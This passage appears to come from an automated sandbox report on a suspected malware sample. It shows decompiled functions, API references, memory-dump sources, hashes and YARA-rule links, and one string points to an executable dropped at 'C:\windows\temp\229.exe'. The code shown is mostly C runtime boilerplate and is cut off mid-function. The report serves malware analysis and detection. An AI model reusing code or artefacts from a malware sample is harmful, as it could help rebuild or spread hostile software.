				}
				E00422195(_a8);
				return 0;
			}

0x0042937b
0x00429380
0x00429394
0x00429397
0x004293c9
0x004293d1
0x004293d3
0x004293ec
0x004293ef
0x004293f2
0x00429400
0x0042940f
0x00429417
0x00429419
0x00429432
0x00429435
0x00429435
0x0042941b
0x00429422
0x0042942d
0x0042942d
0x00429437
0x00429438
0x00000000
0x00429438
0x004293f7
0x004293fc
0x004293fe
0x00000000
0x00000000
0x00000000
0x004293fe
0x004293dc
0x004293e7
0x00000000
0x004293e7
0x00429399
0x0042939c
0x0042939f
0x004293b2
0x004293b5
0x004293b7
0x004293b9
0x00000000
0x004293b9
0x004293a5
0x004293aa
0x004293ac
0x00000000
0x00000000
0x00000000
0x004293ac
0x00429385
0x00000000

APIs

Part of subcall function 0042C2CD: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00427291,?,00000000,?,?,?,00427008,0000FDE9,00000000,?), ref: 0042C36F

GetLastError.KERNEL32(?,C:\windows\temp\229.exe,?,00429509,?,?,?,00000000), ref: 004293D5
__dosmaperr.LIBCMT ref: 004293DC
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,C:\windows\temp\229.exe,?,00429509,?,?,?,00000000), ref: 0042941B
__dosmaperr.LIBCMT ref: 00429422

Strings

C:\windows\temp\229.exe, xrefs: 0042937A

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID: C:\windows\temp\229.exe
API String ID: 1913693674-2872853374
Opcode ID: 2ca94d423a7e278a5ce200bbdd7fec0005ddf7e4ce8b4b329befb44cf95de569
Instruction ID: fe162b2b1264ba48eb1308441bb5192c14559fdfdd89a15ea8799f54ac8143ca
Opcode Fuzzy Hash: 2ca94d423a7e278a5ce200bbdd7fec0005ddf7e4ce8b4b329befb44cf95de569
Instruction Fuzzy Hash: CF21D671708125BFD720BF72AC80D6BB3ADAF14368F90451AF91497240E738EC5287AD

Uniqueness

Uniqueness Score: 100.00%

Function 0041FBDE, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65
UNIQUE

Download Yara Rule

C-Code - Quality: 87%

			E0041FBDE(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				void _v1160;
				long _v1164;
				signed int _t12;
				int _t14;
				intOrPtr _t16;
				intOrPtr _t22;
				intOrPtr* _t26;
				void* _t29;
				intOrPtr _t31;
				void* _t35;
				signed int _t40;
				void* _t52;

				_t12 =  *0x44b6b4; // 0x4a5cc10f
				_v8 = _t12 ^ _t40;
				_t22 = _a8;
				_t31 = _a4;
				_t14 = GetStdHandle(0xfffffff4);
				_t35 = _t14;
				if(_t35 == 0xffffffff || _t35 == 0) {
					L7:
					E00415A87();
					return _t14;
				} else {
					_t14 = GetFileType(_t35);
					if(_t14 != 2) {
						goto L7;
					} else {
						_t14 = swprintf( &_v1160, 0x240, L"Assertion failed: %Ts, file %Ts, line %d\n", _t31, _t22, _a12);
						if(_t14 < 0) {
							goto L7;
						} else {
							_t26 =  &_v1160;
							_t29 = _t26 + 2;
							do {
								_t16 =  *_t26;
								_t26 = _t26 + 2;
							} while (_t16 != 0);
							_v1164 = 0;
							_t28 = _t26 - _t29 >> 1;
							_t14 = WriteConsoleW(_t35,  &_v1160, _t26 - _t29 >> 1,  &_v1164, 0);
							if(_t14 != 0) {
								E0042156A(_t22, _t28, _t29, _t35, _t52);
								asm("int3");
								return L"Assertion failed: %Ts, file %Ts, line %d\n";
							} else {
								goto L7;
							}
						}
					}
				}
			}

0x0041fbe9
0x0041fbf0
0x0041fbf4
0x0041fbf9
0x0041fbfe
0x0041fc04
0x0041fc09
0x0041fc78
0x0041fc80
0x0041fc88
0x0041fc0f
0x0041fc10
0x0041fc19
0x00000000
0x0041fc1b
0x0041fc31
0x0041fc3b
0x00000000
0x0041fc3d
0x0041fc3d
0x0041fc45
0x0041fc48
0x0041fc48
0x0041fc4b
0x0041fc4e
0x0041fc56
0x0041fc62
0x0041fc6e
0x0041fc76
0x0041fc89
0x0041fc8e
0x0041fc94
0x00000000
0x00000000
0x00000000
0x0041fc76
0x0041fc3b
0x0041fc19

APIs

GetStdHandle.KERNEL32(000000F4,-0000000A,001E0000,00000000), ref: 0041FBFE
GetFileType.KERNEL32(00000000), ref: 0041FC10
swprintf.LIBCMT ref: 0041FC31
WriteConsoleW.KERNEL32(00000000,?,?,?,00000000), ref: 0041FC6E

Part of subcall function 00415A87: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00416245
Part of subcall function 00415A87: ___raise_securityfailure.LIBCMT ref: 0041632C

Part of subcall function 0042156A: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00421586

Strings

Assertion failed: %Ts, file %Ts, line %d, xrefs: 0041FC26

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: FeaturePresentProcessor$ConsoleFileHandleTypeWrite___raise_securityfailureswprintf
String ID: Assertion failed: %Ts, file %Ts, line %d
API String ID: 3962779274-1719349581
Opcode ID: f329ef8cc550ad294f1c64772d32ec244039ea9d816d1e1ef3f143cee09384f0
Instruction ID: 5483b57cfeab8b7ee25309e1bbfead8a68814ebdb71012adfc8c8aa92ff67354
Opcode Fuzzy Hash: f329ef8cc550ad294f1c64772d32ec244039ea9d816d1e1ef3f143cee09384f0
Instruction Fuzzy Hash: 2E11087150011CABCB20DB29DC459EF77BCEF95311F5046AAFE1593180EA349D868BE8

Uniqueness

Uniqueness Score: 100.00%

Function 0041FBDE, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65UNIQUE

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,?,?,?), ref: 0041FBFE
GetFileType.KERNEL32(00000000), ref: 0041FC10
swprintf.LIBCMT ref: 0041FC31
WriteConsoleW.KERNEL32(00000000,?,?,?,00000000), ref: 0041FC6E

Part of subcall function 0042156A: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00421586

Strings

Assertion failed: %Ts, file %Ts, line %d, xrefs: 0041FC26

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: ConsoleFeatureFileHandlePresentProcessorTypeWriteswprintf
String ID: Assertion failed: %Ts, file %Ts, line %d
API String ID: 1771108271-1719349581
Opcode ID: c04a5b6db51f43ee66ef5ed15daba82dfceb7f61fae0c162241e28100773f480
Instruction ID: 5483b57cfeab8b7ee25309e1bbfead8a68814ebdb71012adfc8c8aa92ff67354
Opcode Fuzzy Hash: c04a5b6db51f43ee66ef5ed15daba82dfceb7f61fae0c162241e28100773f480
Instruction Fuzzy Hash: 2E11087150011CABCB20DB29DC459EF77BCEF95311F5046AAFE1593180EA349D868BE8

Uniqueness

Uniqueness Score: 100.00%

Function 00404750, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
UNIQUE

Download Yara Rule

C-Code - Quality: 63%

			E00404750(intOrPtr* __ecx, void* __esi) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				char _v16;
				char* _v20;
				intOrPtr* _t42;

				_t40 = __ecx;
				_t42 = __ecx;
				E0041339D(__ecx, 0);
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((char*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((char*)(__ecx + 0x10)) = 0;
				 *((short*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((short*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((char*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((char*)(__ecx + 0x30)) = 0;
				_t29 = _v0;
				if(_v0 == 0) {
					_v12 = 0x437548;
					_v20 = "bad locale name";
					asm("xorps xmm0, xmm0");
					_v16 = 1;
					asm("movq [esp+0x18], xmm0");
					E00416C0B( &_v20,  &_v8);
					_v12 = 0x4376c0;
					E00416C8D( &_v12, 0x447b78);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					 *(_t40 + 4) = _v20;
					 *((intOrPtr*)(_t40 + 8)) = _v16;
					 *_t40 = 0x437520;
					 *((intOrPtr*)(_t40 + 0xc)) = 0;
					 *((intOrPtr*)(_t40 + 0x10)) = 0;
					return _t40;
				} else {
					E00413EBB(__ecx, __ecx, _t29);
					return _t42;
				}
			}

0x00404750
0x00404756
0x00404758
0x0040475d
0x00404766
0x0040476a
0x00404771
0x00404775
0x00404779
0x00404780
0x00404783
0x00404787
0x0040478a
0x0040478d
0x00404790
0x00404793
0x00404799
0x004047b2
0x004047bf
0x004047c7
0x004047ca
0x004047d0
0x004047d6
0x004047de
0x004047f0
0x004047f5
0x004047f6
0x004047f7
0x004047f8
0x004047f9
0x004047fa
0x004047fb
0x004047fc
0x004047fd
0x004047fe
0x004047ff
0x00404804
0x0040480b
0x00404810
0x00404816
0x0040481d
0x00404824
0x0040479b
0x0040479d
0x004047ab
0x004047ab

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404758
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040479D

Part of subcall function 00413EBB: _Yarn.LIBCPMT ref: 00413EDA
Part of subcall function 00413EBB: _Yarn.LIBCPMT ref: 00413EFE

___std_exception_copy.LIBVCRUNTIME ref: 004047D6
__CxxThrowException@8.LIBVCRUNTIME ref: 004047F0

Part of subcall function 00416C8D: KiUserExceptionDispatcher.NTDLL(?,?,0041371A,?,00000008,?,1FFFFFFF,?,?,?,?,0041371A,?,00447D68,?), ref: 00416CEC

Strings

HuC, xrefs: 004047B2

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Yarnstd::_$DispatcherExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_ThrowUser___std_exception_copy
String ID: HuC
API String ID: 393135149-1012242675
Opcode ID: 9099ad48eaf2b34d4b8deb04d37837e80f98258183c9d5ed933f579b770f9142
Instruction ID: ca8fa1812aa4c0275c2c730f638d39d7e738a4dbb363c887aaaa68dfc9ecce16
Opcode Fuzzy Hash: 9099ad48eaf2b34d4b8deb04d37837e80f98258183c9d5ed933f579b770f9142
Instruction Fuzzy Hash: A21130B14187409ED320DF39C84578BBFE4AF69314F04CA1EE4D993651E779E148CBAA

Uniqueness

Uniqueness Score: 100.00%

Function 0042274F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
libraryloaderUNIQUE

Download Yara Rule

C-Code - Quality: 25%

			E0042274F(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x437268(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x00422755
0x00422759
0x00422764
0x0042276c
0x00422777
0x0042277d
0x00422781
0x00422788
0x0042278e
0x0042278e
0x00422790
0x00422795
0x00000000
0x0042279a
0x004227a3

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00422701,?,?,004226C9,?,?,?), ref: 00422764
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,00422701,?,?,004226C9,?,?,?), ref: 00422777
FreeLibrary.KERNEL32(00000000,?,?,00422701,?,?,004226C9,?,?,?), ref: 0042279A

Strings

mscoree.dll, xrefs: 0042275D
CorExitProcess, xrefs: 0042276F

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 48db9dea7a5052fb163c5a3831377201673e905beb33daec7ba799ea01710382
Instruction ID: a0999c2e47ce9c0153cf131e8ab8a359d0246a6dd02b3fccc47528576c8e3fc9
Opcode Fuzzy Hash: 48db9dea7a5052fb163c5a3831377201673e905beb33daec7ba799ea01710382
Instruction Fuzzy Hash: 41F08231A08328FBDF259B50ED49B9E7A78DB44761F1011B1FC44A2260DBB45E00EA9C

Uniqueness

Uniqueness Score: 100.00%

Function 004244ED, Relevance: 7.7, APIs: 5, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E004244ED(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int* _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int* _v732;
				intOrPtr _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1264;
				intOrPtr _v1276;
				signed int _v1288;
				signed int _t240;
				void* _t243;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				void* _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t264;
				signed int _t267;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				intOrPtr _t278;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				intOrPtr _t286;
				signed int _t289;
				signed int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t311;
				signed int _t313;
				signed int _t315;
				signed int _t320;
				void* _t321;
				signed int _t323;
				void* _t324;
				intOrPtr _t325;
				signed int _t329;
				signed int _t330;
				intOrPtr* _t335;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				intOrPtr* _t354;
				signed int _t356;
				intOrPtr* _t361;
				signed int _t365;
				intOrPtr* _t366;
				intOrPtr* _t369;
				void* _t372;
				signed int _t373;
				signed int _t376;
				intOrPtr* _t377;
				signed int _t386;
				intOrPtr _t389;
				intOrPtr* _t390;
				signed int _t392;
				signed int* _t396;
				signed int _t397;
				intOrPtr* _t403;
				signed int _t412;
				short _t413;
				void* _t414;
				signed int _t415;
				void* _t416;
				signed int _t417;
				signed int _t419;
				intOrPtr _t420;
				signed int _t423;
				intOrPtr _t424;
				signed int _t426;
				signed int _t429;
				intOrPtr _t435;
				signed int _t436;
				signed int _t438;
				signed int _t439;
				signed int _t443;
				signed int _t445;
				signed int _t448;
				signed int* _t449;
				intOrPtr* _t450;
				short _t451;
				void* _t453;
				signed int _t455;
				signed int _t457;
				void* _t459;
				void* _t460;
				void* _t462;
				signed int _t463;
				void* _t464;
				void* _t466;
				signed int _t467;
				void* _t469;
				void* _t471;
				signed int _t483;
				void* _t487;

				_t487 = __fp0;
				_t411 = __edx;
				_t453 = _t459;
				_t460 = _t459 - 0x10;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t349 = E0042151C(0x6a6);
				_t239 = 0;
				_pop(_t361);
				if(_t349 == 0) {
					L20:
					return _t239;
				} else {
					_push(__edi);
					_t2 = _t349 + 4; // 0x4
					_t419 = _t2;
					 *_t419 = 0;
					 *_t349 = 1;
					_t435 = _a4;
					_t240 = _t435 + 0x30;
					_push( *_t240);
					_v16 = _t240;
					_push(0x43dc18);
					_push( *0x43db54);
					E00424427(_t349, _t361, __edx, _t419, _t435, _t419, 0x351, 3);
					_t462 = _t460 + 0x18;
					_v8 = 0x43db54;
					while(1) {
						L2:
						_t243 = E0042920C(_t419, 0x351, 0x43dc14);
						_t463 = _t462 + 0xc;
						if(_t243 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t403 = _t8;
							_t329 =  *_v16;
							_v16 = _t403;
							_t361 =  *_t403;
							_v20 = _t361;
							goto L4;
						}
						while(1) {
							L4:
							_t411 =  *_t329;
							if(_t411 !=  *_t361) {
								break;
							}
							if(_t411 == 0) {
								L8:
								_t330 = 0;
							} else {
								_t411 =  *((intOrPtr*)(_t329 + 2));
								if(_t411 !=  *((intOrPtr*)(_t361 + 2))) {
									break;
								} else {
									_t329 = _t329 + 4;
									_t361 = _t361 + 4;
									if(_t411 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0x43dc18);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t330);
							_t335 = _v8 + 0xc;
							_v8 = _t335;
							_push( *_t335);
							E00424427(_t349, _t361, _t411, _t419, _t435, _t419, 0x351, 3);
							_t462 = _t463 + 0x18;
							if(_v8 < 0x43db84) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E004214E2(_t349);
									_t426 = _t419 | 0xffffffff;
									__eflags =  *(_t435 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E004214E2( *(_t435 + 0x28));
										}
									}
									__eflags =  *(_t435 + 0x24);
									if( *(_t435 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t426 == 1;
										if(_t426 == 1) {
											E004214E2( *(_t435 + 0x24));
										}
									}
									 *(_t435 + 0x24) = 0;
									 *(_t435 + 0x1c) = 0;
									 *(_t435 + 0x28) = 0;
									 *((intOrPtr*)(_t435 + 0x20)) = 0;
									_t239 =  *((intOrPtr*)(_t435 + 0x40));
								} else {
									_t429 = _t419 | 0xffffffff;
									_t483 =  *(_t435 + 0x28);
									if(_t483 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t483 == 0) {
											E004214E2( *(_t435 + 0x28));
										}
									}
									if( *(_t435 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t429 == 1) {
											E004214E2( *(_t435 + 0x24));
										}
									}
									 *(_t435 + 0x24) =  *(_t435 + 0x24) & 0x00000000;
									_t28 = _t349 + 4; // 0x4
									_t239 = _t28;
									 *(_t435 + 0x1c) =  *(_t435 + 0x1c) & 0x00000000;
									 *(_t435 + 0x28) = _t349;
									 *((intOrPtr*)(_t435 + 0x20)) = _t239;
								}
								goto L20;
							}
							goto L131;
						}
						asm("sbb eax, eax");
						_t330 = _t329 | 0x00000001;
						__eflags = _t330;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0041A842();
					asm("int3");
					_push(_t453);
					_t455 = _t463;
					_t464 = _t463 - 0x1d0;
					_t246 =  *0x44b6b4; // 0x4a5cc10f
					_v60 = _t246 ^ _t455;
					_t248 = _v44;
					_push(_t349);
					_push(_t435);
					_t436 = _v40;
					_push(_t419);
					_t420 = _v48;
					_v512 = _t420;
					__eflags = _t248;
					if(_t248 == 0) {
						_v460 = 1;
						_v468 = 0;
						_t351 = 0;
						_v452 = 0;
						__eflags = _t436;
						if(__eflags == 0) {
							L79:
							_t248 = E004244ED(_t351, _t411, _t420, _t436, __eflags, _t487, _t420);
							goto L80;
						} else {
							__eflags =  *_t436 - 0x4c;
							if( *_t436 != 0x4c) {
								L59:
								_t248 = E00424049(_t351, _t361, _t411, _t420, _t436, _t487, _t436,  &_v276, 0x83,  &_v448, 0x55, 0);
								_t466 = _t464 + 0x18;
								__eflags = _t248;
								if(_t248 != 0) {
									_t365 = 0;
									__eflags = 0;
									_t412 = _t420 + 0x20;
									_t438 = 0;
									_v452 = _t412;
									do {
										__eflags = _t438;
										if(_t438 == 0) {
											L74:
											_t252 = _v460;
										} else {
											_t366 =  *_t412;
											_t253 =  &_v276;
											while(1) {
												__eflags =  *_t253 -  *_t366;
												_t420 = _v464;
												if( *_t253 !=  *_t366) {
													break;
												}
												__eflags =  *_t253;
												if( *_t253 == 0) {
													L67:
													_t365 = 0;
													_t254 = 0;
												} else {
													_t413 =  *((intOrPtr*)(_t253 + 2));
													__eflags = _t413 -  *((intOrPtr*)(_t366 + 2));
													_v454 = _t413;
													_t412 = _v452;
													if(_t413 !=  *((intOrPtr*)(_t366 + 2))) {
														break;
													} else {
														_t253 = _t253 + 4;
														_t366 = _t366 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t254;
												if(_t254 == 0) {
													_t351 = _t351 + 1;
													__eflags = _t351;
													goto L74;
												} else {
													_t255 =  &_v276;
													_push(_t255);
													_push(_t438);
													_push(_t420);
													L83();
													_t412 = _v452;
													_t466 = _t466 + 0xc;
													__eflags = _t255;
													if(_t255 == 0) {
														_t365 = 0;
														_t252 = 0;
														_v460 = 0;
													} else {
														_t351 = _t351 + 1;
														_t365 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t254 = _t253 | 0x00000001;
											_t365 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t438 = _t438 + 1;
										_t412 = _t412 + 0x10;
										_v452 = _t412;
										__eflags = _t438 - 5;
									} while (_t438 <= 5);
									__eflags = _t252;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t351;
										if(__eflags != 0) {
											goto L79;
										} else {
											_t248 = _t365;
										}
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t436 + 2) - 0x43;
								if( *(_t436 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t436 + 4)) - 0x5f;
									if( *((short*)(_t436 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t256 = E0042E700(_t436, 0x43dc0c);
											_t353 = _t256;
											_v472 = _t353;
											_pop(_t368);
											__eflags = _t353;
											if(_t353 == 0) {
												break;
											}
											_t257 = _t256 - _t436;
											__eflags = _t257;
											_v460 = _t257 >> 1;
											if(_t257 == 0) {
												break;
											} else {
												_t259 = 0x3b;
												__eflags =  *_t353 - _t259;
												if( *_t353 == _t259) {
													break;
												} else {
													_t423 = _v460;
													_t354 = 0x43db54;
													_v456 = 1;
													do {
														_t260 = E0042E6C6( *_t354, _t436, _t423);
														_t464 = _t464 + 0xc;
														__eflags = _t260;
														if(_t260 != 0) {
															goto L45;
														} else {
															_t369 =  *_t354;
															_t414 = _t369 + 2;
															do {
																_t325 =  *_t369;
																_t369 = _t369 + 2;
																__eflags = _t325 - _v468;
															} while (_t325 != _v468);
															_t368 = _t369 - _t414 >> 1;
															__eflags = _t423 - _t369 - _t414 >> 1;
															if(_t423 != _t369 - _t414 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v456 = _v456 + 1;
														_t354 = _t354 + 0xc;
														__eflags = _t354 - 0x43db84;
													} while (_t354 <= 0x43db84);
													_t351 = _v472 + 2;
													_t261 = E0042E66B(_t368, _t351, 0x43dc14);
													_t420 = _v464;
													_t439 = _t261;
													_pop(_t372);
													__eflags = _t439;
													if(_t439 != 0) {
														L48:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t373 = _v452;
															goto L54;
														} else {
															_push(_t439);
															_t264 = E0042D6F6( &_v276, 0x83, _t351);
															_t467 = _t464 + 0x10;
															__eflags = _t264;
															if(_t264 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E0041A842();
																asm("int3");
																_push(_t455);
																_t457 = _t467;
																_t267 =  *0x44b6b4; // 0x4a5cc10f
																_v560 = _t267 ^ _t457;
																_push(_t351);
																_t356 = _v544;
																_push(_t439);
																_push(_t420);
																_t424 = _v548;
																_v1288 = _t356;
																_v1276 = E004251AF(_t372, _t411, _t487) + 0x278;
																_t274 = E00424049(_t356, _t372, _t411, _t424, _v540, _t487, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1264);
																_t469 = _t467 - 0x2e4 + 0x18;
																__eflags = _t274;
																if(_t274 == 0) {
																	L122:
																	_t275 = 0;
																	__eflags = 0;
																	goto L123;
																} else {
																	_t102 = _t356 + 2; // 0x6
																	_t443 = _t102 << 4;
																	__eflags = _t443;
																	_t276 =  &_v280;
																	_v724 = _t443;
																	_t415 =  *(_t443 + _t424);
																	_t376 = _t415;
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t276 -  *_t376;
																		_t445 = _v724;
																		if( *_t276 !=  *_t376) {
																			break;
																		}
																		__eflags =  *_t276;
																		if( *_t276 == 0) {
																			L89:
																			_t277 = _v712;
																		} else {
																			_t451 =  *((intOrPtr*)(_t276 + 2));
																			__eflags = _t451 -  *((intOrPtr*)(_t376 + 2));
																			_v714 = _t451;
																			_t445 = _v724;
																			if(_t451 !=  *((intOrPtr*)(_t376 + 2))) {
																				break;
																			} else {
																				_t276 = _t276 + 4;
																				_t376 = _t376 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L89;
																				}
																			}
																		}
																		L91:
																		__eflags = _t277;
																		if(_t277 != 0) {
																			_t377 =  &_v280;
																			_t416 = _t377 + 2;
																			do {
																				_t278 =  *_t377;
																				_t377 = _t377 + 2;
																				__eflags = _t278 - _v712;
																			} while (_t278 != _v712);
																			_v728 = (_t377 - _t416 >> 1) + 1;
																			_t281 = E0042151C(4 + ((_t377 - _t416 >> 1) + 1) * 2);
																			_v740 = _t281;
																			__eflags = _t281;
																			if(_t281 == 0) {
																				goto L122;
																			} else {
																				_v736 =  *((intOrPtr*)(_t445 + _t424));
																				_v748 =  *(_t424 + 0xa0 + _t356 * 4);
																				_v752 =  *(_t424 + 8);
																				_v716 = _t281 + 4;
																				_t283 = E00421D09(_t281 + 4, _v728,  &_v280);
																				_t471 = _t469 + 0xc;
																				__eflags = _t283;
																				if(_t283 != 0) {
																					_t284 = _v712;
																					_push(_t284);
																					_push(_t284);
																					_push(_t284);
																					_push(_t284);
																					_push(_t284);
																					E0041A842();
																					asm("int3");
																					_t286 =  *0x44de88; // 0x0
																					return _t286;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t445 + _t424)) = _v716;
																					if(_v280 != 0x43) {
																						L100:
																						_t289 = E00423D56(_t356, _t424,  &_v708);
																						_t386 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L100;
																						} else {
																							_t386 = _v712;
																							_t289 = _t386;
																						}
																					}
																					 *(_t424 + 0xa0 + _t356 * 4) = _t289;
																					__eflags = _t356 - 2;
																					if(_t356 != 2) {
																						__eflags = _t356 - 1;
																						if(_t356 != 1) {
																							__eflags = _t356 - 5;
																							if(_t356 == 5) {
																								 *((intOrPtr*)(_t424 + 0x14)) = _v720;
																							}
																						} else {
																							 *((intOrPtr*)(_t424 + 0x10)) = _v720;
																						}
																					} else {
																						_t449 = _v732;
																						_t417 = _t386;
																						_t396 = _t449;
																						 *(_t424 + 8) = _v720;
																						_v716 = _t449;
																						_v728 = _t449[8];
																						_v720 = _t449[9];
																						while(1) {
																							__eflags =  *(_t424 + 8) -  *_t396;
																							if( *(_t424 + 8) ==  *_t396) {
																								break;
																							}
																							_t450 = _v716;
																							_t417 = _t417 + 1;
																							_t320 =  *_t396;
																							 *_t450 = _v728;
																							_v720 = _t396[1];
																							_t396 = _t450 + 8;
																							 *((intOrPtr*)(_t450 + 4)) = _v720;
																							_t356 = _v744;
																							_t449 = _v732;
																							_v728 = _t320;
																							_v716 = _t396;
																							__eflags = _t417 - 5;
																							if(_t417 < 5) {
																								continue;
																							} else {
																							}
																							L108:
																							__eflags = _t417 - 5;
																							if(__eflags == 0) {
